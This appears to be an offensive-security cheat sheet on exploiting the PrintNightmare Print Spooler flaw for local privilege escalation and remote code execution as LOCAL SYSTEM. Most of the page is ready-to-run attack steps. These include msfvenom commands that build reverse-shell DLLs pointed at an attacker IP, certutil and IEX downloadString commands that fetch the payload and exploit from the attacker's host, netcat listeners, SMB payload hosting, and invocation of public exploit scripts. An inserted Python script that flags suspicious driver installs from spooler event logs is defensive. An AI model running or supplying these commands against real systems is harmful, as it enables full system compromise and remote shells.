PRIMARY CATEGORY → PRINT SPOOLER SERVICE

Theory

PrintNightmare is a well-known security flaw tracked as CVE-2021-34527 and CVE-2021-1675

The vulnerable endpoint is the Windows Print Spooler service, which runs as LOCAL SYSTEM

Therefore, an operator could leverage the security flaws in this service to gain remote or local code execution as LOCAL SYSTEM, which means that the entire system in question is compromised


Code Execution as LOCAL SYSTEM

Windows Privesc

Workflow

The RpcAddPrinterDriverEx and RpcAddPrinterDriver functions of the MS-PAR ( Microsoft Print System Asynchronous Remote Protocol ) protocol do not correctly verify the permissions a remote peer has to install a printer driver on the given system

Therefore, we could leverage this broken permission validation to load a malicious DLL file instead of a legitimate printer driver. Since this service runs as LOCAL SYSTEM, we will gain code execution as this system account, thereby compromising the entire system

So, once we compromise a non-privileged user account, we can simply call or invoke one of the vulnerable RPC functions and pass to it a malicious DLL we crafted previously, which can be located locally or remotely
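From the defender's side, the same mechanism leaves a trail: the spooler logs every driver it adds to Microsoft-Windows-PrintService/Operational as Event ID 316 ( "Printer driver ... was added or updated. Files:- ..." ), and a DLL it cannot load as a driver plug-in produces Event ID 808 ( "The print spooler failed to load a plug-in module ..." ). The script below is an added detection example, not part of this page or of any of the tools it references. It runs over constructed sample records, assumes the message text follows the format shown in those samples, and uses a constructed per-host allow-list of expected driver file names; a real deployment would feed it the exported event fields instead.

```python
"""
Added detection example: flag Print Spooler driver installs that look like
PrintNightmare (CVE-2021-1675 / CVE-2021-34527) abuse.

Log source: Microsoft-Windows-PrintService/Operational
  316  printer driver added or updated (lists the driver's files)
  808  spooler failed to load a plug-in module (path of the offending DLL)
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed allow-list: driver file names considered normal on this host.
# In practice this is built from a known-good baseline of the driver store.
KNOWN_DRIVER_FILES = {"unidrv.dll", "unidrvui.dll", "kernelbase.dll",
                      "mxdwdrv.dll", "unires.dll"}


@dataclass
class PrintEvent:
    ts: datetime
    event_id: int
    message: str


# Constructed sample records (not real telemetry). The second and third
# mirror the page's scenario: an unknown driver whose file list contains
# remote.dll, followed by a load failure for that same DLL.
SAMPLE_EVENTS = [
    PrintEvent(datetime(2021, 7, 1, 10, 0, 0), 316,
               "Printer driver Microsoft XPS Document Writer v4 for Windows x64 "
               "Version-4 was added or updated. Files:- mxdwdrv.dll, unires.dll"),
    PrintEvent(datetime(2021, 7, 1, 10, 5, 0), 316,
               "Printer driver 1234 for Windows x64 Version-3 was added or updated. "
               "Files:- UNIDRV.DLL, kernelbase.dll, remote.dll"),
    PrintEvent(datetime(2021, 7, 1, 10, 5, 1), 808,
               "The print spooler failed to load a plug-in module "
               "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\remote.dll, "
               "error code 0x45A."),
]

# Message formats assumed by this example (see lead-in).
ADDED_RE = re.compile(
    r"^Printer driver (?P<name>.+?) for Windows (?P<arch>\S+) Version-(?P<ver>\d+) "
    r"was added or updated\. Files:-\s*(?P<files>.*)$")
FAILED_RE = re.compile(r"failed to load a plug-in module (?P<path>.+?), error code")


def parse_driver_add(message):
    """Return driver name, version and lower-cased file list from a 316 message."""
    m = ADDED_RE.match(message)
    if m is None:
        return None
    files = [f.strip().lower() for f in m.group("files").split(",") if f.strip()]
    return {"name": m.group("name"), "version": int(m.group("ver")), "files": files}


def unknown_files(files):
    """Driver files that are not in the host's baseline."""
    return [f for f in files if f not in KNOWN_DRIVER_FILES]


def find_suspicious(events, window=timedelta(minutes=5)):
    """Flag 316 events that ship unknown files; an 808 naming one of those
    files within `window` raises the finding from medium to high."""
    failed_loads = []
    for e in events:
        if e.event_id == 808:
            m = FAILED_RE.search(e.message)
            if m:
                failed_loads.append((e.ts, m.group("path")))

    findings = []
    for e in events:
        if e.event_id != 316:
            continue
        info = parse_driver_add(e.message)
        if info is None:
            continue
        unk = unknown_files(info["files"])
        if not unk:
            continue
        correlated = [path for ts, path in failed_loads
                      if e.ts <= ts <= e.ts + window
                      and path.lower().rsplit("\\", 1)[-1] in unk]
        findings.append({"ts": e.ts, "driver": info["name"],
                         "unknown_files": unk, "load_failures": correlated,
                         "severity": "high" if correlated else "medium"})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['ts']} driver={f['driver']!r} "
              f"unknown={f['unknown_files']} load_failures={f['load_failures']}")
```

The allow-list approach is deliberately simple: on most hosts, legitimate driver installs are rare and come from a small, stable set of files, so any 316 event that introduces a file name the baseline has never seen is worth a look, and a matching 808 shortly afterwards is a strong signal that something other than a printer driver was handed to the spooler.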

Requirements
  • The operator must have low-privileged access to the system, i.e. Interactive ( e.g. physical ), RemoteInteractive ( e.g. RDP ) or Network ( e.g. WinRM, reverse shell and so on )

  • The Print Spooler service must be running on the target

Abuse - Windows

Verifying whether the service is running or not

CMD & PS

sc.exe queryex spooler

PS

Get-CIMInstance -ClassName win32_service -Filter 'name="spooler"' | Select -ExpandProperty state

Verifying if the service runs as LOCAL SYSTEM

It’s usually not necessary to check this, but we can never be sure unless we check it

Get-CIMInstance -ClassName win32_service -Filter 'name="spooler"' | Select -ExpandProperty startName

Malicious DLL Setup

  • Creating the malicious DLL

From the attacker ⚔️

msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --arch x64 --platform windows --format dll --out <MALICIOUS>.dll
  • Transferring it to the target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPE
certutil.exe -urlcache -split -f "http://<ATTACKER_IP>/<MALICIOUS>.dll"

Exploit Setup

CVE-2021-1675

Fileless

  • Downloading the exploit

From the attacker ⚔️

curl --silent --location --request GET --remote-name 'https://github.com/calebstewart/CVE-2021-1675/raw/refs/heads/main/CVE-2021-1675.ps1'

  • Transferring it to the target

From the attacker ⚔️

python -m http.server 80

From the target 🎯

IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/CVE-2021-1675.ps1')

Setting up a TCP Listener

From the attacker ⚔️

rlwrap -CaR nc -nlvp <TCP_PORT>

Running the exploit

From the target 🎯

Invoke-Nightmare -DLL '<DLL>'

RCE as LOCAL SYSTEM

Workflow

See Code Execution as LOCAL SYSTEM

Requirements
  • A controlled local or domain user account

  • The Print Spooler service must be running on the target

  • The RPC endpoint must be accessible ( either via named pipes or dynamic ports )

Abuse - UNIX-Like

Checking if the target’s RPC named pipes are available

Impacket’s RPCDump.py

Looking for MS-RPRN or MS-PAR pipes enabled

rpcdump.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' | grep -iP --color -- 'MS-(RPRN|PAR)'

Creating a DLL Payload (Reverse Shell)

MSFVenom

msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --format dll --platform windows --arch x64 --out remote.dll

Setting up an SMB Server

Impacket’s SMBServer.py

smbserver.py -smb2support <SHARE> <LOCAL_PATH>

Setting up a Netcat Listener for the Reverse Shell

Netcat

rlwrap -CaR nc -nlvp <PORT>

Running the Exploit

CVE-2021-1675.py

From the Attacker ⚔️

python3 CVE-2021-1675.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' '\\<ATTACKER>\<SHARE>\remote.dll'